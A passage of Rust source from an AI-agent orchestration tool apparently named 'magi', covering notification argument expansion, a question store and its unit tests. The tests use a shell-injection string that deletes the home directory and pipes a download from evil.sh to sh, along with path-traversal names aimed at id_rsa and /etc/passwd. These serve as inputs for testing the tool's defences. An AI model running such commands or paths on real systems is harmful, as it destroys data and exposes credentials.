1764/// argument to one program, and a summary containing the characters `{run}` is
1765/// not re-expanded. That property is the reason agent-authored text can be put
1766/// in a notification at all.
1767///
1768/// An error here is reported, not swallowed, so `magi notify --test` can show
1769/// the operator why nothing arrives. The waiting path logs it and carries on.
1770pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1771    notify_text(cmd, &q.run, &q.summary).await
1772}
1773
1774/// [`notify`] for an event that is not a question: the same command, the same
1775/// placeholders, with `summary` and `run` supplied directly.
1776pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1777    let Some((program, args)) = cmd.command.split_first() else {
1778        // No command configured: the web UI is the only surface, by choice.
1779        return Ok(());
1780    };
1781    let url = web_url();
1782    if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1783        tracing::warn!(
1784            "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1785             so the link will be empty - export it next to `magi serve` with \
1786             the address `magi web --open` printed"
1787        );
1788    }
1789    let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1790    tracing::debug!(program = %program, args = ?argv, "notifying");
1791
1792    let mut child = tokio::process::Command::new(program);
1793    child.quiet();
1794    child
1795        .args(&argv)
1796        .stdin(std::process::Stdio::null())
1797        // Killed if the timeout below drops this future: a notification
1798        // command left running would outlive the run it was announcing.
1799        .kill_on_drop(true);
1800    let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1801        Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1802        Err(_) => bail!(
1803            "notification command `{program}` did not finish within {}s",
1804            NOTIFY_TIMEOUT.as_secs()
1805        ),
1806    };
1807    if !out.status.success() {
1808        let stderr = String::from_utf8_lossy(&out.stderr);
1809        let why = stderr
1810            .lines()
1811            .rev()
1812            .find(|l| !l.trim().is_empty())
1813            .unwrap_or("no output on stderr")
1814            .trim();
1815        bail!(
1816            "notification command `{program}` exited with {}: {why}",
1817            out.status
1818        );
1819    }
1820    Ok(())
1821}
1822
1823/// Substitute `{summary}`, `{run}` and `{url}` into one argument.
1824///
1825/// One left-to-right pass, so a substituted value is never scanned for further
1826/// placeholders. Agent prose contains braces, and an agent quoting `{summary}`
1827/// in a question must not make the notification recursive.
1828fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
1829    let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1830    let mut out = String::with_capacity(template.len());
1831    let mut rest = template;
1832    while let Some(at) = rest.find('{') {
1833        out.push_str(&rest[..at]);
1834        let tail = &rest[at..];
1835        match table.iter().find(|(token, _)| tail.starts_with(token)) {
1836            Some((token, value)) => {
1837                out.push_str(value);
1838                rest = &tail[token.len()..];
1839            }
1840            None => {
1841                // Not a placeholder magi knows: it is the operator's own text.
1842                out.push('{');
1843                rest = &tail[1..];
1844            }
1845        }
1846    }
1847    out.push_str(rest);
1848    out
1849}
1850
1851/// The URL `{url}` expands to, from [`WEB_URL_ENV`].
1852fn web_url() -> String {
1853    question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1854}
1855
1856/// Point a configured base URL at the view that can answer the question.
1857///
1858/// A notification the operator has to navigate from is a question that stays
1859/// unanswered until morning, so the questions view is appended - unless the
1860/// operator already wrote a fragment, in which case they have said where they
1861/// want to land and magi does not know better.
1862fn question_url(base: &str) -> String {
1863    let base = base.trim().trim_end_matches('/');
1864    if base.is_empty() || base.contains('#') {
1865        return base.to_owned();
1866    }
1867    format!("{base}/#/questions")
1868}
1869
1870/// Assemble a panel's contents in an already-empty directory.
1871///
1872/// Split out so [`Questions::put_panel`] can delete the whole directory on the
1873/// first error without an early `return` skipping that cleanup.
1874fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1875    let index = dir.join(PANEL_HTML);
1876    std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1877    for (name, src) in assets {
1878        let dst = dir.join(name);
1879        std::fs::copy(src, &dst)
1880            .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1881    }
1882    Ok(())
1883}
1884
1885/// Remove a directory and everything under it, treating "not there" as done.
1886///
1887/// A panel is replaced wholesale and dropped idempotently, and in both cases
1888/// the absence of the directory is the desired end state, not an error.
1889fn clear_dir(path: &Path) -> Result<()> {
1890    match std::fs::remove_dir_all(path) {
1891        Ok(()) => Ok(()),
1892        Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1893        Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1894    }
1895}
1896
1897fn read_path(path: &Path) -> Result<Question> {
1898    let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1899    let q: Question =
1900        serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1901    if q.schema > SCHEMA {
1902        // Strictly newer, not merely different: every field added since
1903        // schema 1 carries `#[serde(default)]`, so an *older* schema reads
1904        // here as "no thread yet" rather than as garbage. Only a schema this
1905        // build has never heard of is refused.
1906        bail!(
1907            "question {} was written by a newer magi (schema {}, this build \
1908             only speaks up to {SCHEMA})",
1909            q.id,
1910            q.schema
1911        );
1912    }
1913    Ok(q)
1914}
1915
1916/// [`short`] for callers outside this module (a run id shortens the same way).
1917pub fn short_id(id: &str) -> &str {
1918    short(id)
1919}
1920
1921fn short(id: &str) -> &str {
1922    id.split('-').next_back().unwrap_or(id)
1923}
1924
1925fn new_id() -> String {
1926    let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1927    let seed = crate::rng::entropy();
1928    format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1929}
1930
1931#[cfg(test)]
1932mod tests {
1933    use super::*;
1934
1935    /// A store of its own, with no process-global state - which is the point of
1936    /// `Questions::at`, and why these can run in parallel.
1937    fn store() -> (tempfile::TempDir, Questions) {
1938        let dir = tempfile::tempdir().unwrap();
1939        let s = Questions::at(dir.path().join("questions"));
1940        (dir, s)
1941    }
1942
1943    #[test]
1944    fn run_names_task_only_for_task_questions() {
1945        for (node, want) in [
1946            (crate::conduct::NODE, true),
1947            (crate::triage::NODE, true),
1948            (crate::triage::DEPS_NODE, true),
1949            (crate::land::APPROVAL_NODE, false),
1950            (crate::bump::NOTICE_NODE, false),
1951            ("implement", false),
1952        ] {
1953            let mut q = choice_question();
1954            q.node = node.to_owned();
1955            assert_eq!(q.run_names_task(), want, "{node}");
1956        }
1957    }
1958
1959    #[test]
1960    fn deleting_a_run_stops_its_questions_asking() {
1961        let (_dir, store) = store();
1962
1963        let mut open_one = choice_question();
1964        store.put(&mut open_one).unwrap();
1965        let mut answered = free_question();
1966        answered
1967            .answer(Answer::Text("keep this".to_owned()))
1968            .unwrap();
1969        store.put(&mut answered).unwrap();
1970        let mut elsewhere = choice_question();
1971        elsewhere.run = "20260903-105039-3cbf".to_owned();
1972        store.put(&mut elsewhere).unwrap();
1973
1974        let n = store
1975            .abandon_for_run(&open_one.run, "run was deleted")
1976            .unwrap();
1977        assert_eq!(n, 1, "only the open question of that run");
1978
1979        let back = store.get(&open_one.id).unwrap();
1980        assert!(!back.status.open(), "it no longer asks for a decision");
1981        assert!(
1982            back.detail.contains("run was deleted"),
1983            "the operator can see why: {}",
1984            back.detail
1985        );
1986
1987        let kept = store.get(&answered.id).unwrap();
1988        assert_eq!(
1989            kept.status,
1990            QuestionStatus::Answered,
1991            "an answered question is a decision on record, not something to revoke"
1992        );
1993        assert!(
1994            store.get(&elsewhere.id).unwrap().status.open(),
1995            "another run's question is untouched"
1996        );
1997        assert!(store.open_for(&open_one.run).is_empty());
1998    }
1999
2000    #[test]
2001    fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
2002        let (_dir, store) = store();
2003        let mut q = choice_question();
2004        store.put(&mut q).unwrap();
2005
2006        // `Blocked` can still be resumed - leave it exactly as it was.
2007        let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
2008        assert_eq!(n, 0);
2009        assert!(store.get(&q.id).unwrap().status.open());
2010
2011        // `Failed` is not - abandon it, with the run and its fate in the
2012        // reason so the owner can tell what happened without a run to read.
2013        let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
2014        assert_eq!(n, 1);
2015        let back = store.get(&q.id).unwrap();
2016        assert!(!back.status.open());
2017        assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
2018
2019        // A second call against the same, now-settled run finds nothing left.
2020        assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
2021    }
2022
2023    fn choice_question() -> Question {
2024        Question::new(
2025            "20260902-201256-9fb7".to_owned(),
2026            "implement".to_owned(),
2027            "impl-A".to_owned(),
2028            "Which storage backend should the cache use?".to_owned(),
2029            "Both are already dependencies.".to_owned(),
2030            vec!["SQLite".to_owned(), "Redis".to_owned()],
2031        )
2032    }
2033
2034    fn free_question() -> Question {
2035        Question::new(
2036            "20260902-201256-9fb7".to_owned(),
2037            "review".to_owned(),
2038            "rev-1".to_owned(),
2039            "What should the error message say?".to_owned(),
2040            String::new(),
2041            Vec::new(),
2042        )
2043    }
2044
2045    /// No notification, which is the default and what most of these want.
2046    fn quiet() -> config::Notify {
2047        config::Notify::default()
2048    }
2049
2050    #[test]
2051    fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
2052        // The front end parses these names by hand; there is no shared schema
2053        // and no compiler between the two. A rename here is a UI that shows an
2054        // empty card and reports no error, so the names are asserted literally.
2055        let mut q = choice_question();
2056        q.id = "20260902-231501-ab12".to_owned();
2057        let open: serde_json::Value = serde_json::to_value(&q).unwrap();
2058        // `serde_json::Value` holds an object's keys sorted, and key order
2059        // means nothing to a JSON reader anyway: the field *set* is what the
2060        // front end was written against, so that is what is pinned here.
2061        let keys: Vec<&str> = open
2062            .as_object()
2063            .unwrap()
2064            .keys()
2065            .map(String::as_str)
2066            .collect();
2067        assert_eq!(
2068            keys,
2069            [
2070                "actions",
2071                "answer",
2072                "answer_delivered",
2073                "answer_timeout",
2074                "answered_at",
2075                "asked_at",
2076                "assets",
2077                "choices",
2078                "consult",
2079                "cwd",
2080                "delivered_turns",
2081                "deputy",
2082                "detail",
2083                "id",
2084                "node",
2085                "panel",
2086                "run",
2087                "schema",
2088                "seat",
2089                "status",
2090                "summary",
2091                "thread",
2092                "waiter",
2093            ],
2094            "the on-disk field set is a contract with the front end"
2095        );
2096        assert_eq!(open["schema"], 7);
2097        assert_eq!(open["thread"], serde_json::json!([]));
2098        assert_eq!(open["id"], "20260902-231501-ab12");
2099        assert_eq!(open["run"], "20260902-201256-9fb7");
2100        assert_eq!(open["node"], "implement");
2101        assert_eq!(open["seat"], "impl-A");
2102        assert_eq!(open["status"], "open");
2103        assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
2104        assert_eq!(open["answered_at"], serde_json::Value::Null);
2105        assert_eq!(open["answer"], serde_json::Value::Null);
2106        let asked = open["asked_at"].as_str().unwrap();
2107        assert!(
2108            asked.ends_with('Z') && asked.contains('T'),
2109            "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
2110        );
2111
2112        // A chosen option, exactly as the contract spells it.
2113        q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2114        let answered = serde_json::to_value(&q).unwrap();
2115        assert_eq!(answered["status"], "answered");
2116        assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
2117        assert!(answered["answered_at"].is_string());
2118
2119        // And free text, which is the other of the two forms.
2120        let mut free = free_question();
2121        free.answer(Answer::Text("Say which file it was".to_owned()))
2122            .unwrap();
2123        assert_eq!(
2124            serde_json::to_value(&free).unwrap()["answer"],
2125            serde_json::json!({"text": "Say which file it was"})
2126        );
2127
2128        // And it survives the round trip a reader actually performs.
2129        let body = serde_json::to_string(&q).unwrap();
2130        assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
2131    }
2132
2133    #[test]
2134    fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
2135        // Four different mistakes, four different fixes: the web handler shows
2136        // these strings to the person who made them.
2137        let mut unoffered = choice_question();
2138        let a = unoffered
2139            .answer(Answer::Choice("Postgres".to_owned()))
2140            .unwrap_err()
2141            .to_string();
2142
2143        let mut typed = choice_question();
2144        let b = typed
2145            .answer(Answer::Text("use Postgres".to_owned()))
2146            .unwrap_err()
2147            .to_string();
2148
2149        let mut blank = free_question();
2150        let c = blank
2151            .answer(Answer::Text("   \n".to_owned()))
2152            .unwrap_err()
2153            .to_string();
2154
2155        let mut twice = choice_question();
2156        twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2157        let d = twice
2158            .answer(Answer::Choice("Redis".to_owned()))
2159            .unwrap_err()
2160            .to_string();
2161
2162        assert!(a.contains("not one of the choices"), "{a}");
2163        assert!(b.contains("multiple choice"), "{b}");
2164        assert!(c.contains("empty"), "{c}");
2165        assert!(d.contains("already answered"), "{d}");
2166        let mut distinct = vec![a, b, c, d];
2167        let asked = distinct.len();
2168        distinct.sort_unstable();
2169        distinct.dedup();
2170        assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
2171
2172        // The refused ones are still open, so the owner can answer properly.
2173        assert_eq!(unoffered.status, QuestionStatus::Open);
2174        assert_eq!(typed.status, QuestionStatus::Open);
2175        assert_eq!(blank.status, QuestionStatus::Open);
2176        // And the first answer to the double-answered one survived.
2177        assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
2178
2179        // Free text refuses a fabricated choice for the mirror-image reason.
2180        let mut free = free_question();
2181        let e = free
2182            .answer(Answer::Choice("SQLite".to_owned()))
2183            .unwrap_err()
2184            .to_string();
2185        assert!(e.contains("free text"), "{e}");
2186    }
2187
2188    #[test]
2189    fn open_questions_are_listed_before_answered_ones() {
2190        let (_dir, s) = store();
2191        // Ids carry a timestamp, so force a known order: the answered one is
2192        // the newest, and must still sort below the open ones.
2193        let mut old_open = choice_question();
2194        old_open.id = "20260101-000001-aaaa".to_owned();
2195        let mut new_open = choice_question();
2196        new_open.id = "20260101-000002-bbbb".to_owned();
2197        let mut answered = choice_question();
2198        answered.id = "20260101-000003-cccc".to_owned();
2199        answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
2200        for q in [&mut old_open, &mut new_open, &mut answered] {
2201            s.put(q).unwrap();
2202        }
2203
2204        let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
2205        assert_eq!(
2206            ids,
2207            [
2208                "20260101-000002-bbbb",
2209                "20260101-000001-aaaa",
2210                "20260101-000003-cccc"
2211            ],
2212            "what has stopped work comes first; history sorts underneath"
2213        );
2214        assert_eq!(s.count_open(), 2);
2215        assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
2216        assert!(s.open_for("some-other-run").is_empty());
2217        // The short id is what the phone and the reports show.
2218        assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
2219        assert!(s.get("20260101-000002-bbbb").is_ok());
2220        assert!(s.resolve_id("nope").is_err());
2221        assert!(
2222            s.revision() > 0,
2223            "the store's mtime drives the phone's polling"
2224        );
2225    }
2226
2227    #[test]
2228    fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
2229        let (_dir, s) = store();
2230        let mut good = choice_question();
2231        s.put(&mut good).unwrap();
2232        // Truncated by a killed writer, and written by a magi from the future.
2233        std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
2234        let future = serde_json::json!({
2235            "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
2236            "seat": "s", "summary": "?", "detail": "", "choices": [],
2237            "status": "open", "asked_at": "2026-01-01T00:00:00Z",
2238            "answered_at": null, "answer": null,
2239        });
2240        std::fs::write(
2241            s.path_of("20260101-000010-beef"),
2242            serde_json::to_string(&future).unwrap(),
2243        )
2244        .unwrap();
2245
2246        let listed = s.list();
2247        assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
2248        assert_eq!(listed[0].id, good.id);
2249        // Asked for by name, the unreadable one explains itself instead.
2250        let e = s.get("20260101-000010-beef").unwrap_err().to_string();
2251        assert!(e.contains("schema"), "{e}");
2252    }
2253
2254    #[tokio::test]
2255    async fn the_wait_returns_the_answer_another_process_wrote() {
2256        // The phone, `magi answer` and this run are three processes with no
2257        // channel between them: the file is the channel, so the wait has to see
2258        // a write it did not make. Sub-second timings keep this a real wait
2259        // without a real one's duration.
2260        let (dir, s) = store();
2261        let mut q = choice_question();
2262        let id = q.id.clone();
2263        let writer = Questions::at(dir.path().join("questions"));
2264        let handle = tokio::spawn(async move {
2265            tokio::time::sleep(Duration::from_millis(30)).await;
2266            let mut fresh = writer.get(&id).expect("the question was filed first");
2267            fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2268            writer.put(&mut fresh).unwrap();
2269        });
2270
2271        let got = wait_for_owner(
2272            &mut q,
2273            &s,
2274            &quiet(),
2275            Duration::from_secs(5),
2276            Duration::from_millis(10),
2277        )
2278        .await
2279        .unwrap();
2280
2281        handle.await.unwrap();
2282        assert_eq!(got, Wait::Answered("SQLite".to_owned()));
2283        assert_eq!(
2284            q.status,
2285            QuestionStatus::Answered,
2286            "the caller's copy is refreshed from the answering process's record"
2287        );
2288        assert!(q.answered_at.is_some());
2289    }
2290
2291    #[tokio::test]
2292    async fn a_question_nobody_answers_is_abandoned_not_deleted() {
2293        let (_dir, s) = store();
2294        let mut q = choice_question();
2295
2296        let got = wait_for_owner(
2297            &mut q,
2298            &s,
2299            &quiet(),
2300            Duration::from_millis(60),
2301            Duration::from_millis(10),
2302        )
2303        .await
2304        .unwrap();
2305
2306        assert_eq!(
2307            got,
2308            Wait::Abandoned,
2309            "a slow human is not an error; the run parks"
2310        );
2311        assert_eq!(q.status, QuestionStatus::Abandoned);
2312        let on_disk = s.get(&q.id).expect("the record of what was asked survives");
2313        assert_eq!(on_disk.status, QuestionStatus::Abandoned);
2314        assert!(
2315            on_disk.detail.contains("Abandoned:"),
2316            "why nobody answered belongs with the question: {}",
2317            on_disk.detail
2318        );
2319        assert!(on_disk.resolution().is_none());
2320        assert_eq!(s.count_open(), 0);
2321    }
2322
2323    #[tokio::test]
2324    async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
2325        // This is the whole point of slicing: `timeout` (the real
2326        // `answer_timeout` budget) is far larger than `slice`, so the loop
2327        // must land on `slice` first and hand back `Pending` - not read the
2328        // silence so far as the owner having given up.
2329        let (_dir, s) = store();
2330        let mut q = choice_question();
2331        s.put(&mut q).unwrap();
2332
2333        let got = wait_loop(
2334            &mut q,
2335            &s,
2336            Duration::from_secs(3600),
2337            Duration::from_millis(30),
2338            Duration::from_millis(10),
2339        )
2340        .await
2341        .unwrap();
2342
2343        assert_eq!(
2344            got,
2345            Wait::Pending,
2346            "the clock on this call ran out, not the owner's patience"
2347        );
2348        assert_eq!(
2349            q.status,
2350            QuestionStatus::Open,
2351            "a slice expiring must never abandon the question"
2352        );
2353        let on_disk = s.get(&q.id).expect("still on disk, still open");
2354        assert_eq!(
2355            on_disk.status,
2356            QuestionStatus::Open,
2357            "nothing about the record changed just because this call gave up"
2358        );
2359    }
2360
2361    #[tokio::test]
2362    async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
2363        // The shape `magi ask --wait <id>` relies on: one slice finds nothing
2364        // and returns `Pending`, a second slice - a fresh call, exactly as a
2365        // fresh process would make - picks the same question back up and
2366        // sees an answer written in between.
2367        let (dir, s) = store();
2368        let mut q = choice_question();
2369        s.put(&mut q).unwrap();
2370
2371        let first = wait_loop(
2372            &mut q,
2373            &s,
2374            Duration::from_secs(3600),
2375            Duration::from_millis(30),
2376            Duration::from_millis(10),
2377        )
2378        .await
2379        .unwrap();
2380        assert_eq!(first, Wait::Pending);
2381
2382        let id = q.id.clone();
2383        let writer = Questions::at(dir.path().join("questions"));
2384        let mut fresh = writer.get(&id).unwrap();
2385        fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2386        writer.put(&mut fresh).unwrap();
2387
2388        // `resume_wait` uses its own production poll interval rather than a
2389        // test-injected one, so the budget here only needs to be large enough
2390        // to cover one real poll tick - the point is that it is `resume_wait`
2391        // itself, not a helper, that finds the answer.
2392        let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2393            .await
2394            .unwrap();
2395        assert_eq!(second, Wait::Answered("Redis".to_owned()));
2396        assert_eq!(q.status, QuestionStatus::Answered);
2397    }
2398
2399    #[tokio::test]
2400    async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2401        // The owner can speak back while nothing is running at all - between
2402        // one call reporting `Wait::Pending` and the next `--wait` picking
2403        // the question back up - and whoever resumes the wait loads a
2404        // *fresh* copy of the question off disk, one whose thread already
2405        // contains that reply. A baseline taken from that fresh copy would
2406        // treat the reply as pre-existing and never notice it "arrive",
2407        // leaving the agent polling in silence until `answer_timeout`
2408        // eventually abandons the question - replacing the exact accident
2409        // this feature exists to fix with a quieter version of itself.
2410        let (dir, s) = store();
2411        let mut q = choice_question();
2412        s.put(&mut q).unwrap();
2413
2414        let first = wait_loop(
2415            &mut q,
2416            &s,
2417            Duration::from_secs(3600),
2418            Duration::from_millis(30),
2419            Duration::from_millis(10),
2420        )
2421        .await
2422        .unwrap();
2423        assert_eq!(first, Wait::Pending);
2424
2425        // The owner speaks back during the gap, with nobody running yet.
2426        let id = q.id.clone();
2427        let writer = Questions::at(dir.path().join("questions"));
2428        let mut fresh = writer.get(&id).unwrap();
2429        fresh.say("why not Postgres?").unwrap();
2430        writer.put(&mut fresh).unwrap();
2431
2432        // `magi ask --wait` re-reads the question rather than reusing the
2433        // stale in-memory copy the earlier call held - so the copy handed to
2434        // `resume_wait` here already carries the reply, same as `fresh` above.
2435        let mut resumed = s.get(&id).unwrap();
2436        let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2437            .await
2438            .unwrap();
2439        assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2440        assert_eq!(
2441            resumed.status,
2442            QuestionStatus::Open,
2443            "talking back is not a decision; the question stays open"
2444        );
2445    }
2446
2447    #[tokio::test]
2448    async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2449        // A broken webhook must not throw away an implementation, so the wait
2450        // reports the failure and carries on. `notify` itself still says what
2451        // went wrong, because `magi notify --test` has to be able to show it.
2452        let (dir, s) = store();
2453        let broken = config::Notify {
2454            command: vec![
2455                "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2456                "{summary}".to_owned(),
2457            ],
2458        };
2459        let mut q = choice_question();
2460        assert!(
2461            notify(&broken, &q).await.is_err(),
2462            "the caller is told; it decides that it does not matter"
2463        );
2464
2465        let id = q.id.clone();
2466        let writer = Questions::at(dir.path().join("questions"));
2467        let handle = tokio::spawn(async move {
2468            tokio::time::sleep(Duration::from_millis(30)).await;
2469            let mut fresh = writer.get(&id).unwrap();
2470            fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2471            writer.put(&mut fresh).unwrap();
2472        });
2473        let got = wait_for_owner(
2474            &mut q,
2475            &s,
2476            &broken,
2477            Duration::from_secs(5),
2478            Duration::from_millis(10),
2479        )
2480        .await
2481        .unwrap();
2482        handle.await.unwrap();
2483        assert_eq!(got, Wait::Answered("Redis".to_owned()));
2484
2485        // No command at all is the default, and is silence rather than failure.
2486        assert!(notify(&quiet(), &q).await.is_ok());
2487        assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2488    }
2489
2490    #[test]
2491    fn notification_arguments_are_substituted_and_never_a_shell_string() {
2492        let mut q = choice_question();
2493        q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2494        let template = [
2495            "ntfy".to_owned(),
2496            "publish".to_owned(),
2497            "--click".to_owned(),
2498            "{url}".to_owned(),
2499            "--title".to_owned(),
2500            "magi {run} needs you".to_owned(),
2501            "{summary}".to_owned(),
2502        ];
2503        let argv: Vec<String> = template
2504            .iter()
2505            .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2506            .collect();
2507
2508        assert_eq!(
2509            argv,
2510            [
2511                "ntfy",
2512                "publish",
2513                "--click",
2514                "http://100.64.0.1:7777/#/questions",
2515                "--title",
2516                "magi 20260902-201256-9fb7 needs you",
2517                "; rm -rf ~ && curl evil.sh | sh #",
2518            ],
2519            "the shell metacharacters are one argument's contents, not syntax"
2520        );
2521
2522        // A summary that itself mentions a placeholder is text, not a template:
2523        // one left-to-right pass means a substituted value is never rescanned.
2524        q.summary = "should {url} be configurable?".to_owned();
2525        assert_eq!(
2526            expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2527            "should {url} be configurable?"
2528        );
2529        // An unknown brace is the operator's own text and survives untouched.
2530        assert_eq!(
2531            expand("{title}: {run}", &q.run, &q.summary, ""),
2532            "{title}: 20260902-201256-9fb7"
2533        );
2534        assert_eq!(
2535            expand("no placeholders", &q.run, &q.summary, "http://x"),
2536            "no placeholders"
2537        );
2538    }
2539
2540    #[test]
2541    fn the_notification_link_lands_on_the_view_that_can_answer() {
2542        assert_eq!(
2543            question_url("http://100.64.0.1:7777"),
2544            "http://100.64.0.1:7777/#/questions"
2545        );
2546        assert_eq!(
2547            question_url("http://100.64.0.1:7777/"),
2548            "http://100.64.0.1:7777/#/questions"
2549        );
2550        // An operator who wrote a fragment has said where they want to land.
2551        assert_eq!(
2552            question_url("http://magi.ts.net/#/runs"),
2553            "http://magi.ts.net/#/runs"
2554        );
2555        // Unset expands to nothing rather than to a guessed address.
2556        assert_eq!(question_url("  "), "");
2557    }
2558
2559    /// A question with a fixed id, so a panel's path on disk is predictable.
2560    fn panelled() -> Question {
2561        let mut q = choice_question();
2562        q.id = "20260903-014455-ab12".to_owned();
2563        q
2564    }
2565
2566    #[test]
2567    fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2568        let (dir, s) = store();
2569        let work = dir.path().join("worktree");
2570        std::fs::create_dir_all(&work).unwrap();
2571        std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2572        std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2573
2574        let mut q = panelled();
2575        let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2576        s.put_panel(
2577            &mut q,
2578            html,
2579            &[work.join("table.png"), work.join("diff.svg")],
2580        )
2581        .unwrap();
2582        s.put(&mut q).unwrap();
2583
2584        assert!(q.panel);
2585        assert_eq!(
2586            q.assets,
2587            ["diff.svg", "table.png"],
2588            "sorted, not in the order the agent happened to pass them"
2589        );
2590        assert_eq!(
2591            s.panel_html(&q.id).as_deref(),
2592            Some(html),
2593            "the html is stored byte for byte; the agent authored the markup"
2594        );
2595        assert_eq!(
2596            s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2597            Some(&b"<svg/>"[..])
2598        );
2599
2600        // The record on disk carries the same two fields the front end reads.
2601        let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2602        let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2603        assert_eq!(json["panel"], true);
2604        assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2605        let back = s.get(&q.id).unwrap();
2606        assert!(back.panel);
2607        assert_eq!(back.assets, q.assets);
2608
2609        // The assets were copied, so the panel still renders after `magi fold`
2610        // has deleted the candidate worktree the agent authored it in.
2611        std::fs::remove_dir_all(&work).unwrap();
2612        assert_eq!(
2613            s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2614            Some(&b"\x89PNG"[..]),
2615            "a referenced asset would be gone with the worktree"
2616        );
2617    }
2618
2619    #[test]
2620    fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2621        let (dir, s) = store();
2622        let mut q = panelled();
2623        s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2624        s.put(&mut q).unwrap();
2625
2626        // A file exactly one level up from the panel directory - which is
2627        // where `..` lands - holding content a read would make visible.
2628        let secret = "this must never reach the browser";
2629        std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2630        assert_eq!(
2631            std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2632            secret,
2633            "the traversal is real: the operating system resolves this path \
2634             happily, which is why the name has to be refused before the join"
2635        );
2636
2637        let long = "x".repeat(200);
2638        for name in [
2639            "..",
2640            "../id_rsa",
2641            "..\\id_rsa",
2642            "sub/../id_rsa",
2643            "/",
2644            "\\",
2645            "/etc/passwd",
2646            "C:\\Windows\\win.ini",
2647            "",
2648            ".hidden",
2649            ".",
2650            long.as_str(),
2651        ] {
2652            assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2653            let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2654            assert!(
2655                e.contains("not a panel file name"),
2656                "`{name}` must be refused as a name, not attempted: {e}"
2657            );
2658            assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2659        }
2660        // A name that is allowed still finds its file, so the refusals above
2661        // were the rule at work and not a store that reads nothing.
2662        assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2663
2664        // The same rule on the write side, where the name comes from a source
2665        // file's base name, and a refusal leaves the stored panel untouched.
2666        let hidden = dir.path().join(".hidden");
2667        std::fs::write(&hidden, "x").unwrap();
2668        let e = s
2669            .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2670            .unwrap_err()
2671            .to_string();
2672        assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2673        assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2674        assert!(q.assets.is_empty());
2675    }
2676
2677    #[test]
2678    fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2679        let (dir, s) = store();
2680        let mut q = panelled();
2681        s.put(&mut q).unwrap();
2682
2683        // Sized rather than filled: the cap reads the file's length, and a
